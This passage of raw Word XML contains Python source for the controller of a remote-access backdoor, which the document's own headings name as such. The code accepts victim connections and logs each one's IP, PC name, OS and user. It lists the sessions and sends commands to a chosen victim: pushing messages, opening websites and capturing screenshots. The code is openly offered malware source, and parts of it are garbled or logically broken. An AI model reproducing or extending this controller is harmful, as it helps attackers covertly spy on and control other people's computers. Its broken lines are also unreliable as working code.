        <w:t xml:space="preserve">            address += client_info[0], client_info[1], client_info[2]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            arrAddresses.append(address)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("\n" + "Connection has been established: {0} ((1))".format(address[0],address[2]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>except socket.error:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("Error accepting connections!")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This to list all the connections and interact with connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def main_menu():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        strChoice = input("\n"+"&gt;&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        if strChoice == "l":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            list_connections()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        elif strChoice[:3] == "-1" and len(strChoice) &gt; 3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            conn = select_connection(strChoice [4:], "True")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            if conn is not None:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                send_commands()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        elif strChoice == "x":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("invalid choice, Please try again")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            menu_help()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def close():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    global arrConnections, arrAddresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    if len(arrAddresses) == 0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pP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return</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for intCounter, conn in enumerate(arrConnections):</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conn.send(str.encode("exit"))</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conn.close()</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del arrConnections; arrConnections = []</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del arrAddresses; arrAddresses = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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def list_connections():</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if len(arrConnections) &gt; 0:</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strClients = ""</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for intCounter, conn in enumerate(arrConnections):</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strClients += str(intCounter) + " - " + str(arrAddresses[intCounter][0]) + " - " + \</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str(arrAddresses[intCounter][1]) + " - " + str(arrAddresses[intCounter][2]) + " - " + \</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str(arrAddresses[intCounter][3]) + "\n"</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print("\n" + "ID" + " " * 3 + center(str(arrAddresses[0][0]), "IP") + " " * 4 + \</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center(str(arrAddresses[0][1]), "Port") + " " * 4 + \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">              center(str(arrAddresses[0][2]), "PC Name") + " " * 4 + \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="179"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#Send message client from backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>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center(str(arrAddresses[0][3]), "OS") + "\n" + strClients, end="")</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else:</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print("No connections.")</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def select_connection(connection_id, blnGetResponse):</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global conn, arrInfo</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try:</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connection_id = int(connection_id)</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conn = arrConnections[connection_id]</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except:</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print("Invalid choice, please try again!")</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return</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else:</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 [IP, port, PC name, OS, User]</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arrInfo = str(arrAddresses[connection_id][0]), str(arrAddresses[connection_id][2]), \</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str(arrAddresses[connection_id][3]), \</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str(arrAddresses[connection_id][4])</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if blnGetResponse == "True":</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print("You are connected to " + arrInfo[0] + "....." + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="default"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="default"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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return conn</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def send_commands():</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while True:</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strChoice = input("\n" + "Type Selection: ")</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if strChoice[:3] == "--m" and len(strChoice) &gt; 3:</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strMsg = "msg" + strChoice [4:]</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send(str.encode(strMsg))</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elif strChoice[:3] == "o" and len(strChoice) &gt; 3:</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strSite = "site" + strChoice [4:]</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send(str.encode(strSite))</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elif strChoice == "p":</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screenshot()</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def screenshot():</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send(str.encode("screen"))</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strClientResponse = decode_utf(recv(intBuff))</w:t>
      </w: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print("\n" + strClientResponse)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    intBuffer = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="196"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">#Screenshot code </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="196"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def screenshot():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    send(str.encode("screen"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    strClientResponse = decode_utf(recv(intBuff))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("\n" + strClientResponse)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
